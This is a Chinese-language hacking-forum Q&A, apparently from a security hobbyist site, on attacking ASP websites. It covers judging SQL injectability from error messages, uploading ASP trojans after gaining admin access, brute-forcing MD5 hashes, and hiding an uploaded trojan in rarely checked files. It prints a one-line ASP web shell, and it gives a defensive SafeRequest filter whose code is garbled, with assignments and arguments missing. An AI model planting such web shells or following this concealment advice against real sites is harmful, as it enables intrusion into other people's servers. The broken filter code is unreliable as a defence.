http://nb.unionbyte.com/View.asp?PostID1457033 (2)问这种情况能不能注入 Microsoft VBScript 运行时错误 错误 800a000d 类型不匹配: Clng (或类型不匹配: CInt) 答参数已经做了过滤,虽然不是很友好,但也是不能注入的了。 (3)问得到网站后台管理权限后有没有方法在网站上上传木马用什么办法 答找可以上传东西的地方看能不能上传asp木马。 SQLSERVER的必须得到绝对路径,然后可以用NBWS等工具生成. (4)问这个MD5(如ab2a34fdf3fd232)怎么破? 答目前MD5只能是暴力破解请不要叫其他人破。自己去下载工具去破。工具在这里 http://nb.unionbyte.com/View.asp?PostID1457924 (5)问防止sql注入的好方法 答分别从数字字符搜索防止。详细防止看小竹写的这个函数 Function SafeRequest(ParaName,ParaType) --- 传入参数 --- ParaName:参数名称-字符型 ParaType:参数类型-数字型(1表示以上参数是数字0表示以上参数为字符) Dim ParaValue ParaValueRequest(ParaName) If ParaType1 then If not isNumeric(ParaValue) then Response.write 参数 ParaName 必须为数字型 Response.end End if Else ParaValuereplace(ParaValue,,) End if SafeRequestParaValue End function (6)问木马上传后怎么样才更隐蔽 答从管理员角度去想问题你可以写进他不常用的文件里面。不常看常改的文件里面是比较安全的。或者写一句话木马%if request(x) then execute request(x)% (7)问我得到了字符的unicode码以后但是我不知道如何把它还原成字符啊。 答SQLSERVER的nchar或VB的chrw都可以还原 (8)问下载了数据库但找不到后台 答找后台没有捷径继续找或尝试另外的思路。
